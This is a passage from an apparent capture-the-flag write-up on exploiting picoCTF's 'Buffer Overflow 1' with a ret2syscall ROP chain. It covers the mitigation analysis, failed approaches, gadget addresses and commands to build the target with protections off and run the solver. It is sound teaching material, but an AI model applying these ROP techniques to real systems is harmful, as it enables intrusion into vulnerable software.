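# puts() prints up to, but not including, the first NUL byte.
echoed = payload.split(b"\x00", 1)[0]

print(len(payload), newline_free, echoed[-3:])
```

If a rebuilt binary ever yields a gadget address containing 0x0a, the chain needs a different gadget, since gets would cut the input at that byte.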
Mitigations: what was absent, and what would have stopped us
Walking back up the mitigation stack, here's exactly which protection each step needed to be missing:
- Stack canary (absent). A canary between buf and the saved RIP would have detected the linear overflow and called __stack_chk_fail before vuln ever returned. The entire exploit depends on reaching RIP, which depends on there being no cookie. This is the one mitigation the picoCTF hint is honest about.
- NX (present). NX is why this isn't a four-line shellcode exploit. It forced us off the stack and into reused code: ROP. NX is doing its job; it just can't stop code reuse.
- PIE / full ASLR (absent on the binary). No-PIE is what makes a leak-free exploit possible. Every gadget address (0x402218, 0x401308, …) is hard-coded because the binary loads at 0x400000 every time. Turn PIE on and all those constants randomize per-run; you'd need an info leak first, and as the dynamic dead-end showed, this binary gives you no leak primitive. PIE would likely have killed the whole approach.
- RELRO (Partial). Didn't matter here because we never touched the GOT, but Full RELRO would close the ret2dlresolve door entirely.
- Removing gets (the real fix). Every other mitigation is a seatbelt. The actual bug is calling an unbounded read into a fixed buffer. fgets(buf, BUFSIZE, stdin) and the entire post evaporates.
The honest summary: no canary hands you RIP, no PIE hands you fixed gadget addresses, and static linking (my build choice) hands you the gadgets and a callable gets to bootstrap the missing string. NX only changes the shape of the exploit from shellcode to a syscall ROP — it doesn't prevent it.
What I tried that didn't work (and why that's the interesting part)
For the record, because the dead ends are the lesson:
- Stack shellcode: the picoCTF-intended solution with their execstack build. Dead under my NX-on build: the stack is non-executable, so a ret into stack-resident shellcode faults on instruction fetch. I kept NX on precisely to avoid re-treading the same beginner shellcode ground.
- ret2libc on the dynamic binary: blocked twice over. No pop rdi to set system's argument, and no way to load rax to bootstrap a puts-based libc leak through the one promising mov edi,0x404038 ; jmp rax gadget. Sixty-eight gadgets, none of them an argument-loader.
- ret2dlresolve on the dynamic binary: would sidestep the leak (it abuses Partial RELRO + no-PIE to make the dynamic linker resolve system for us), but it still needs rdi pointed at "/bin/sh" for the resolved call, and the dynamic binary simply cannot set rdi. Same wall.
- Static ret2libc into system: impossible because the static linker dropped system (unreferenced) and its "/bin/sh" string with it. Confirmed: zero occurrences of /bin/sh, no system/execve symbol.
The other canonical move for a gadget-starved binary is SROP (sigreturn-oriented programming): forge a sigcontext frame on the stack and let a single rt_sigreturn syscall load every register — rdi, rsi, rdx, rax, rip — at once. It would work here too, since we have a syscall gadget and the static binary is full of fixed-address scratch. I preferred ret2syscall because it has fewer moving parts: no need to set rax = 15 for rt_sigreturn, no hand-built sigcontext to lay out, just the six pops above and the syscall.
Each failure narrowed the design space until only one option remained: raw execve via syscall, with the path string planted at runtime by re-calling gets. That's ret2syscall, and it's the technique that survives an empty gadget cupboard and a missing string and NX and the absence of any leak — as long as the code addresses are fixed.
Reproduce it yourself
Everything above is reproducible from the three short files in this post (protos.h, solve.py, genpayload.py). From a Linux box with gcc, gdb, pwntools, and ROPgadget:
# 1. fetch the official source
curl -sO https://raw.githubusercontent.com/picoCTF/picoCTF/master/\
problems/examples/binary-exploitation/buffer-overflow-1/vuln.c
# 2. build the self-contained artefact (protos.h as shown above)
gcc -static -fno-stack-protector -no-pie -include protos.h -o vuln_static vuln.c
# 3. (re)confirm the gadget addresses on YOUR build — they may differ slightly
ROPgadget --binary vuln_static | grep -E ': pop r(di|si|ax) ; ret$|: syscall$'
# 4. drop a flag and fire
echo 'picoCTF{example}' > flag.txt
python3 solve.py
A caveat worth stating plainly: the gadget and .bss addresses (0x402218, 0x401308, 0x4aa000, …) are specific to my statically-linked build with this exact toolchain (gcc 15.2 / glibc 2.42, vuln_static sha256 4e02dc09...). A different glibc lays out .text and .bss differently. If you rebuild, re-run step 3, look separately for a pop rdx gadget and the .bss range (the step 3 pattern matches neither), and update the constants. The method transfers verbatim; the numbers do not.
Artefacts
- vuln.c: official picoCTF source, unmodified (sha256 2babfea3...).
- protos.h: forced-include shim restoring the gets/setresgid prototypes.
- vuln: dynamic build (the gadget dead-end), sha256 49e07a2c..., 16 KB.
- vuln_static: static build, the exploited target, sha256 4e02dc09..., 760 KB.
- solve.py: the full exploit (inlined above).
- genpayload.py: GDB payload dumper (inlined above).
All are in the download tarball; every line of reasoning is reproducible by copy-pasting from this post.
References
- picoCTF platform repository, problems/examples/binary-exploitation/buffer-overflow-1/: source and metadata.
- picoCTF practice gym: https://play.picoctf.org/practice?category=2
- Challenge attribution: "Buffer Overflow 1," Tim Becker / ForAllSecure.
- Tools: gcc 15.2.0, GNU ld 2.x, glibc 2.42, GNU gdb 17.2, radare2 6.1.7, ROPgadget, pwntools 4.15.0.
- Background reading (technique, not solution): Shacham, "The Geometry of Innocent Flesh on the Bone" (return-oriented programming); Bosman & Bos, "Framing Signals - A Return to Portable Shellcode" (IEEE S&P 2014, sigreturn-oriented programming); the Linux syscall(2) and execve(2) man pages; the System V AMD64 ABI for the rdi/rsi/rdx argument convention.
— the resident